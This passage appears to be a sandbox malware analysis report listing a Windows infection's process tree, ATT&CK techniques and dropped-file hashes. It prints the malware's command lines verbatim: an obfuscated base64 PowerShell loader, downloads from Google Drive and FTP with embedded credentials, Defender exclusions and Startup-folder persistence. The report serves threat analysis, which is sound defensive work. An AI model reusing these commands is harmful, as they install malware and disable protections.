ЉZQBfШḆЉDШḆЉШḆЉXwШḆЉ1ШḆЉF8ШḆЉaQBjШḆЉHMШḆЉYgBoШḆЉDcШḆЉQwBQШḆЉDШḆЉШḆЉSQBmШḆЉFШḆЉШḆЉZШḆЉBBШḆЉDIШḆЉMQШḆЉxШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCAAUABwAFYAaQBzACQAKAAgAD0AIABQAHAAVgBpAHMAJAB7ACAAKQBWAFIAQgBIAEIAJAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABWAFIAQgBIAEIAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACШḆЉAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAdgBaAGwAYgBsACQAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAHYAWgBsAGIAbAAkACAAOwA=';$GyXhB = $mpAQs.replace('ШḆЉ' , 'A') ;$VFuwc = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $GyXhB ) ); $VFuwc = $VFuwc[-1..-$VFuwc.Length] -join '';$VFuwc = $VFuwc.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs');powershell $VFuwc
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $lblZv = $host.Version.Major.Equals(2) ;if ($lblZv) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$BHBRV = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($BHBRV) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$vurKw = (New-Object Net.WebClient);$vurKw.Encoding = [System.Text.Encoding]::UTF8;$vurKw.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$Cslio = (New-Object Net.WebClient);$Cslio.Encoding = [System.Text.Encoding]::UTF8;$Cslio.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lBCzSg = $Cslio.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$Cslio.dispose();$Cslio = (New-Object Net.WebClient);$Cslio.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $Cslio.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '22%80b6e83148d91b945dc23514175566ee22%=v&daolnwod=ecruos&txt.4202.80.62.dirgni72%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.80.62.dirgni22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.229551bb218b-7888-d234-e861-36a46a6a/Xkm5Ru8z/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4764
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:4952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4176
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2388
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4844
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3532
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2572
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2396
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:996
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4116
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4252
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:380
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4520
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3596
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3664
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1468
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3092
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:804
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3504
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:100
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2996
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4328
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2472
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2852
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2272
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3872
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1648
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4992
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1916
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2824
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3932
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3352
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:1488
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:5068
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4268
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3156
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4300
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3232
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:5088
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4820
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:4928
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2876
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2664
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2684
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:3460
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:2396
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\84b91713ac74dfd54024b218dc6149cb60646018f70e4ee50e5038b84e43a70c.vbs"
      4⤵
      PID:960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
33e8f83245c487f8d77217aace54f346

SHA1
0684ac36ef745f40b9fec99730ef05a48380655e

SHA256
d43b826d69fdf9844dad9ce623dabdcd636b4085141ddb704c73953e1d2c8ed6

SHA512
75b2af4cb5dd0f06eb04816dbff7c95f3af01704759abdbb58787d6fde790324d370b81735760b258bdc4d0a1bb65089145d5255a91aacfa39fefe9abad3d322

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

Filesize
355B

MD5
967eb55005b30c47f32376bc2bcfe01d

SHA1
4e0ef0d27139685f669c2d209517bbb76649a10e

SHA256
1b5d83bb7b160cf7af02f1fcd87dc47a851495339e98e1f3c369337c6b96a31f

SHA512
6d24c54302e9e9f3d8702037a83185279acac8fae1e93b798ad480148f63bee1a34d90c5c9a0da4c1571ed3d4b1d69033137027aac4b9ace9134f9a3a4546062

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m0afmhtt.bl2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2432-22-0x000001DC602D0000-0x000001DC602DA000-memory.dmp

Filesize
40KB

Download
memory/3380-0-0x00007FF8F62D3000-0x00007FF8F62D5000-memory.dmp

Filesize
8KB

Download
memory/3380-1-0x000001D049490000-0x000001D0494B2000-memory.dmp

Filesize
136KB

Download
memory/3380-11-0x00007FF8F62D0000-0x00007FF8F6D91000-memory.dmp

Filesize
10.8MB

Download
memory/3380-12-0x00007FF8F62D0000-0x00007FF8F6D91000-memory.dmp

Filesize
10.8MB

Download
memory/3380-60-0x00007FF8F62D3000-0x00007FF8F62D5000-memory.dmp

Filesize
8KB

Download
memory/3380-61-0x00007FF8F62D0000-0x00007FF8F6D91000-memory.dmp

Filesize
10.8MB

Download